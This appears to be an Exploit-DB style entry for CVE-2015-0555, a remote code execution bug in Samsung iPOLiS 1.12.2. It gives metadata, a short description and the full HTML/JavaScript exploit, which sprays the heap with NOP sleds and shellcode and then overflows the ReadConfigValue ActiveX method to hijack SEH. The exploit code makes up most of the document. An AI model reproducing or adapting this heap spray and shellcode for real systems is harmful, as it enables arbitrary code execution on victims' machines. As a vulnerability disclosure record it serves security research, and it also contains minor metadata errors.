Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray)

vendor:

iPOLiS

by:

Praveen Darshanam

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: iPOLiS

Affected Version From: 1.12.2002

Affected Version To: 1.12.2002

Patch Exists: YES

Related CWE: 2015-0555

CPE: a:samsung:ipolis:1.12.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 IE6/7

2015

Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray)

This exploit is a heap spray attack against Samsung iPOLiS 1.12.2. It uses a malicious JavaScript code to trigger a crash in the ReadConfigValue function. The code contains a shellcode which is unescaped and stored in a variable. The code then creates an array of 500 blocks, each containing the shellcode. The code then creates a buffer of 5000 bytes, which is passed to the ReadConfigValue function, triggering the crash. The SEH and nSEH will point to 0x06060606, which will point to the (nops+shellcode) chunk.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

<html>
<!--
Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx
Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray)
CVE: 2015-0555
Author: Praveen Darshanam
http://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html
http://darshanams.blogspot.com/
Tested on Windows XP SP3 IE6/7
Thanks to Peter Van Eeckhoutte for his wonderfull exploit writing tutorials
-->
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>

var shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100');
var bigblock = unescape('%u9090%u9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;

var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;

var memory = new Array();
for (i = 0; i < 500; i++){ memory[i] = block + shellcode }

// SEH and nSEH will point to 0x06060606
// 0x06060606 will point to (nops+shellcode) chunk
var hbuff = "";
for (i = 0; i <5000; i++)
{
	hbuff += "\x06";
}

// trigget crash
target.ReadConfigValue(hbuff);
</script>
</html>